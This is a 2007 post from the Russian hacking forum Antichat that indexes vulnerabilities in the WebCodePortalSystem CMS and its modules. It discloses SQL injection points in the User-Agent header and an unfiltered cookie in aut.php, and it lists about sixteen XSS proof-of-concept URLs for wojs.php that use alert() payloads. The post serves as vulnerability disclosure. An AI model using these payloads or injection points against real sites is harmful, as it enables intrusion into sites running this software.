ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор уязвимостей Wcps ]
  #1  
Старый 06.10.2007, 21:10
Аватар для Dr.Z3r0
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию [ Обзор уязвимостей Wcps ]

Уязвимости WebCodePortalSystem:
WebCodePortalSystem <= 3.7.1 - SQL инъекции, Пассивные XSS (c) I-I()/Ib
WebCodePortalSystem <= 3.8.3.1 - Общая информация, Активная XSS, SQL инъекция (+видео), Способ заливки шелла (c) Grey
WebCodePortalSystem <= 4.0.1 - Активная XSS (c) Grey
WebCodePortalSystem <= 4.0.1 - SQL инъекция (c) Grey
WebCodePortalSystem <= 4.0.1 - Флудилка форума (c) Grey
WebCodePortalSystem <= 4.0.1 - Пассивная XSS, SQL инъекция (c) I-I()/Ib
WebCodePortalSystem <= 4.0.1 - сплойт под SQL инъекцию (c) I-I()/Ib
WebCodePortalSystem <= 4.1 - SQL инъекция: "понижение прав админа" (+видео) (с) Grey
WebCodePortalSystem <= 4.1 - Пассивные XSS (c) I-I()/Ib
WebCodePortalSystem <= 4.1 - Активная XSS (с) Grey
WebCodePortalSystem <= 4.1 - Локальный инклуд, Пассивная XSS (c) Macro
WebCodePortalSystem <= 4.2.1 - Пассивные XSS (c) I-I()/Ib
WebCodePortalSystem <= 4.2.1 - Перезапись переменных (c) I-I()/Ib
WebCodePortalSystem <= 4.2.1 (4.2.2) - Небольшая статья про использование XSS: "Создание привилегированного пользователя..." (+снифер, +видео) (с) Grey
WebCodePortalSystem <= 4.2.1 - Активная XSS (c) I-I()/Ib
WebCodePortalSystem <= 4.2.1 (4.2.2) - Пассивная XSS (с) Grey
WebCodePortalSystem <= 4.3 - Пассивная XSS (с) Macro
WebCodePortalSystem <= 4.3 - SQL инъекция (+сплойт) (c) I-I()/Ib
WebCodePortalSystem <= 4.3 - Пассивная XSS (с) Grey
WebCodePortalSystem <= 4.3.1 - Пассивные XSS (c) I-I()/Ib
WebCodePortalSystem <= 4.3.1 - Локальный инклуд (c) I-I()/Ib
WebCodePortalSystem <= 4.3.1 - Пассивная XSS (с) Grey
WebCodePortalSystem <= 4.3.1 - Льём шелл... (с) Grey
WebCodePortalSystem <= 4.4.1 - Remote include (+сплойт) (с) I-I()/Ib
WebCodePortalSystem <= 4.4.2 - SQL injection (с) I-I()/Ib
WebCodePortalSystem <= 4.4.3 - SQL injection (с) I-I()/Ib
WebCodePortalSystem <= 5 - SQL injection (с) I-I()/Ib
Уязвимости дополнительных модулей WebCodePortalSystem:
AvtoBloger V2.0 - Пассивная XSS (c) I-I()/Ib
Cates v1.0 - SQL инъекция (+сплойт) (c) I-I()/Ib
NewsTematic 1.1 - Пассивные XSS (c) I-I()/Ib
mod_BigNews1.1/Mod download sql inj - Пассивные XSS/SQL инъекция (c) gibson
=============== =============== =============== ===============

WebCodePortalSystem
http://wcps.ru/

Насчет версий не знаю. Точно уязвима версия 3.7.1 именно в ней я баги и нашел. Проверял около полгода назад только сейчас руки дошли опубликовать...

Mysql-injection: Параметр User-agent в заголовках пакетов фильтруется только на drop, delete, union, char, benchmark

Mysql-injection: Параметр xxxxxxxxx_id_wcps в Cookie не фильтруется никак. Уязвимый скрипт: aut.php

XSS:
Код:
http://test2.ru/php/wojs.php?tit=xss</title><body onload=javascript:alert('xss')>
http://test2.ru/php/wojs.php?name_titl=xss</title><body onload=javascript:alert('xss')>
http://test2.ru/php/wojs.php?inflang=alert('xss');
http://test2.ru/php/wojs.php?type=alert('xss');
http://test2.ru/php/wojs.php?bord=');alert('xss');('
http://test2.ru/php/wojs.php?bg=');alert('xss');('
http://test2.ru/php/wojs.php?bgz=');alert('xss');('
http://test2.ru/php/wojs.php?zag=');alert('xss');('
http://test2.ru/php/wojs.php?txt=');alert('xss');('
http://test2.ru/php/wojs.php?fs=');alert('xss');('
http://test2.ru/php/wojs.php?cnt=');alert('xss');('
http://test2.ru/php/wojs.php?wd=');alert('xss');('
http://test2.ru/php/wojs.php?tit=');alert('xss');('
http://test2.ru/php/wojs.php?simage=');alert('xss');('
http://test2.ru/php/wojs.php?hover=');alert('xss');('
http://test2.ru/php/wojs.php?vdata=');alert('xss');('
__________________
Кто я?..

Последний раз редактировалось Grey; 17.08.2009 в 01:58..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ